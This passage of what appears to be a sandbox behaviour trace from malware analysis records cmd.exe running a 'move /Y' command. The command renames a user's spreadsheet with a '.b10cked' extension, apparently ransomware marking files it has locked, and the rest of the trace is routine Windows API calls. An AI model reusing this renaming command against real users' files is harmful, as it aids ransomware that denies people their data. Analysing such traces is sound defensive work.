hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.464] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.464] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.465] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.465] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.466] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.466] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0139.470] GetEnvironmentStringsW () returned 0x3001b0* [0139.471] FreeEnvironmentStringsW (penv=0x3001b0) returned 1 [0139.471] GetEnvironmentStringsW () returned 0x3001b0* [0139.471] FreeEnvironmentStringsW (penv=0x3001b0) returned 1 [0139.471] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e81c | out: phkResult=0x18e81c*=0x40) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x0, lpData=0x18e828*=0xe8, lpcbData=0x18e820*=0x1000) returned 0x2 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x1, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x0, lpData=0x18e828*=0x1, lpcbData=0x18e820*=0x1000) returned 0x2 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x0, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x40, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x40, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x0, lpData=0x18e828*=0x40, lpcbData=0x18e820*=0x1000) returned 0x2 [0139.471] RegCloseKey (hKey=0x40) returned 0x0 [0139.471] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e81c | out: phkResult=0x18e81c*=0x40) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x0, lpData=0x18e828*=0x40, lpcbData=0x18e820*=0x1000) returned 0x2 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x1, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x0, lpData=0x18e828*=0x1, lpcbData=0x18e820*=0x1000) returned 0x2 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x0, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x9, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x4, lpData=0x18e828*=0x9, lpcbData=0x18e820*=0x4) returned 0x0 [0139.471] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e824, lpData=0x18e828, lpcbData=0x18e820*=0x1000 | out: lpType=0x18e824*=0x0, lpData=0x18e828*=0x9, lpcbData=0x18e820*=0x1000) returned 0x2 [0139.472] RegCloseKey (hKey=0x40) returned 0x0 [0139.472] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0139.472] srand (_Seed=0x5b88636e) [0139.472] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked\"" [0139.472] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked\"" [0139.472] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.472] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x301910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0139.472] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0139.472] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.472] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.472] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0139.472] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0139.472] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0139.472] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0139.472] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0139.472] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0139.472] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0139.472] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0139.472] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0139.473] GetEnvironmentStringsW () returned 0x302300* [0139.473] FreeEnvironmentStringsW (penv=0x302300) returned 1 [0139.473] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.473] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0139.473] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0139.473] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0139.473] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0139.473] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0139.473] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0139.473] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0139.473] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0139.473] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0139.473] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f5e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.473] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f5e8, lpFilePart=0x18f5e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f5e4*="Desktop") returned 0x18 [0139.473] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.473] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f364 | out: lpFindFileData=0x18f364) returned 0x300040 [0139.473] FindClose (in: hFindFile=0x300040 | out: hFindFile=0x300040) returned 1 [0139.473] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f364 | out: lpFindFileData=0x18f364) returned 0x300040 [0139.473] FindClose (in: hFindFile=0x300040 | out: hFindFile=0x300040) returned 1 [0139.473] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f364 | out: lpFindFileData=0x18f364) returned 0x300040 [0139.474] FindClose (in: hFindFile=0x300040 | out: hFindFile=0x300040) returned 1 [0139.474] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0139.474] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0139.474] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0139.474] GetEnvironmentStringsW () returned 0x302b20* [0139.474] FreeEnvironmentStringsW (penv=0x302b20) returned 1 [0139.474] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.474] GetConsoleOutputCP () returned 0x1b5 [0139.484] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.484] GetUserDefaultLCID () returned 0x409 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f728, cchData=128 | out: lpLCData="0") returned 2 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f728, cchData=128 | out: lpLCData="0") returned 2 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f728, cchData=128 | out: lpLCData="1") returned 2 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0139.490] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0139.490] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0139.491] GetConsoleTitleW (in: lpConsoleTitle=0x2f0900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.494] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0139.494] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0139.494] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0139.494] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0139.495] _wcsicmp (_String1="move", _String2=")") returned 68 [0139.495] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0139.495] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0139.495] _wcsicmp (_String1="IF", _String2="move") returned -4 [0139.495] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0139.495] _wcsicmp (_String1="REM", _String2="move") returned 5 [0139.495] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0139.498] GetConsoleTitleW (in: lpConsoleTitle=0x18f420, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0139.509] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0139.509] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0139.509] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0139.509] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0139.509] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0139.509] _wcsicmp (_String1="move", _String2="CD") returned 10 [0139.509] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0139.509] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0139.509] _wcsicmp (_String1="move", _String2="REN") returned -5 [0139.509] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0139.509] _wcsicmp (_String1="move", _String2="SET") returned -6 [0139.509] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0139.509] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0139.509] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0139.509] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0139.509] _wcsicmp (_String1="move", _String2="MD") returned 11 [0139.509] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0139.509] _wcsicmp (_String1="move", _String2="RD") returned -5 [0139.509] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0139.509] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0139.509] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0139.509] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0139.509] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0139.509] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0139.510] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0139.510] _wcsicmp (_String1="move", _String2="VER") returned -9 [0139.510] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0139.510] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0139.510] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0139.510] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0139.510] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0139.510] _wcsicmp (_String1="move", _String2="START") returned -6 [0139.510] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0139.510] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0139.510] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0139.511] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0139.511] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0139.511] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f1dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f1d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f1d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0139.511] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0139.511] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0139.511] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0139.511] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0139.511] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0139.512] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0139.512] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0139.513] _wcsicmp (_String1="iu1VEIcz.ods", _String2=".") returned 59 [0139.513] _wcsicmp (_String1="iu1VEIcz.ods", _String2="..") returned 59 [0139.513] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\iu1veicz.ods")) returned 0x20 [0139.513] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x301e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0139.513] SetErrorMode (uMode=0x0) returned 0x0 [0139.513] SetErrorMode (uMode=0x1) returned 0x0 [0139.513] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", nBufferLength=0x104, lpBuffer=0x18eb64, lpFilePart=0x18eb4c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", lpFilePart=0x18eb4c*="iu1VEIcz.ods") returned 0x34 [0139.513] SetErrorMode (uMode=0x0) returned 0x1 [0139.513] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd")) returned 0x12 [0139.513] _wcsicmp (_String1="iu1VEIcz.ods", _String2=".") returned 59 [0139.513] _wcsicmp (_String1="iu1VEIcz.ods", _String2="..") returned 59 [0139.513] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\iu1veicz.ods")) returned 0x20 [0139.513] SetErrorMode (uMode=0x0) returned 0x0 [0139.513] SetErrorMode (uMode=0x1) returned 0x0 [0139.513] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", nBufferLength=0x104, lpBuffer=0x18efe0, lpFilePart=0x18ed78 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", lpFilePart=0x18ed78*="iu1VEIcz.ods") returned 0x34 [0139.513] SetErrorMode (uMode=0x0) returned 0x1 [0139.513] SetErrorMode (uMode=0x0) returned 0x0 [0139.514] SetErrorMode (uMode=0x1) returned 0x0 [0139.514] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked", nBufferLength=0x104, lpBuffer=0x18f1e8, lpFilePart=0x18ed78 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked", lpFilePart=0x18ed78*="iu1VEIcz.ods.b10cked") returned 0x3c [0139.514] SetErrorMode (uMode=0x0) returned 0x1 [0139.514] SetLastError (dwErrCode=0x0) [0139.514] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\iu1veicz.ods.b10cked")) returned 0xffffffff [0139.514] GetLastError () returned 0x2 [0139.514] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", fInfoLevelId=0x1, lpFindFileData=0x18e6f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e6f4) returned 0x2f0ef0 [0139.514] FindNextFileW (in: hFindFile=0x2f0ef0, lpFindFileData=0x18e6f4 | out: lpFindFileData=0x18e6f4) returned 0 [0139.514] GetLastError () returned 0x12 [0139.514] FindClose (in: hFindFile=0x2f0ef0 | out: hFindFile=0x2f0ef0) returned 1 [0139.515] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", fInfoLevelId=0x1, lpFindFileData=0x301c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301c30) returned 0x2f0ef0 [0139.515] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked", nBufferLength=0x104, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked", lpFilePart=0x0) returned 0x3c [0139.515] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", nBufferLength=0x104, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", lpFilePart=0x0) returned 0x34 [0139.516] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\iu1veicz.ods")) returned 0x20 [0139.516] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\iu1veicz.ods"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\iu1veicz.ods.b10cked"), dwFlags=0x3) returned 1 [0139.516] FindClose (in: hFindFile=0x2f0ef0 | out: hFindFile=0x2f0ef0) returned 1 [0139.516] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e940 | out: _Buffer=" 1") returned 9 [0139.516] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.516] GetFileType (hFile=0x7) returned 0x2 [0139.610] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0139.610] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e8cc | out: lpMode=0x18e8cc) returned 1 [0139.610] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.610] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e900 | out: lpConsoleScreenBufferInfo=0x18e900) returned 1 [0139.610] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0139.611] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e940 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0139.611] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e924, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e924*=0x1a) returned 1 [0139.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.611] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0139.611] _get_osfhandle (_FileHandle=1) returned 0x7 [0139.611] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0139.612] _get_osfhandle (_FileHandle=0) returned 0x3 [0139.612] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0139.612] SetConsoleInputExeNameW () returned 0x1 [0139.612] GetConsoleOutputCP () returned 0x1b5 [0139.612] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0139.612] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.612] exit (_Code=0) Process: id = "161" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = 